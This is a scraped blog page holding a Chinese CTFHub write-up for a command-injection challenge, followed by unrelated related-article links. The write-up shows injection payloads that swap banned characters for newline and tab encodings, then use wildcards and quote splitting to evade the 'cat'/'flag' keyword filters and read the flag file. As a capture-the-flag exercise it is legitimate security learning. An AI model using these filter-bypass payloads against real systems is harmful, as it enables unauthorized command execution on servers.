当前位置: 首页 > news >正文

CTFHUB-web-RCE-综合过滤练习

news 2025/7/9 1:15:17

开启题目

查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ,都进行了过滤处理

发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问

127.0.0.1%0als

用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过

127.0.0.1%0als%09*here

127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php

http://www.lryc.cn/news/417738.html

相关文章:

  • Leetcode75-7 除自身以外数组的乘积
  • AI绘画工具介绍:以新奇角度分析与探索AI绘画艺术与技术的交汇点
  • 基于Springboot + Vue的宿舍管理系统
  • CTFHUB-web-RCE-eval执行
  • Oracle DBA常用 sql
  • MindSearch:AI 时代的“思考型”搜索引擎
  • 机器学习练手(四):基于SVM 的肥胖风险分类
  • AutoGPT项目实操总结
  • uniapp 荣耀手机 没有检测到设备 运行到Android手机 真机运行
  • 【EtherCAT】Windows+Visual Studio配置SOEM主站——静态库配置+部署
  • 【Python小游戏示例:猜拳游戏】
  • 多态实现的必要条件,实现多态的三个方法,输入一个URL的过程,死锁产生的原理和条件,进程和线程的定义及区别,进程通信的几种方式
  • Springboot+MybatisPlus项目中,数据库表中存放Date,查出后转为String
  • JavaDS —— AVL树
  • NSSCTF练习记录:[SWPUCTF 2021 新生赛]jicao
  • LabVIEW位移检测系统
  • 02、MySQL-DML(数据操作语言)
  • vue3 项目部署到线上环境,初始进入系统,页面卡顿大概一分钟左右,本地正常无卡顿。localStorage缓存1MB数据导致页面卡顿。
  • 软件更新中的风险识别与质量保证机制分析
  • QT下载与安装
  • Java 2.2 - Java 集合
  • Linux驱动.之I2C,iic驱动层(二)
  • 【STM32】USART串口和I2C通信
  • 【Material-UI】按钮组:垂直按钮组详解
  • DDR5 的优势与应用
  • STM32 - 笔记
  • 基于QT实现的简易WPS(已开源)
  • Flask-WTF 表单处理详细教程(第六阶段)
  • C语言 | Leetcode C语言题解之第330题按要求补齐数组
  • 无人机之测绘行业篇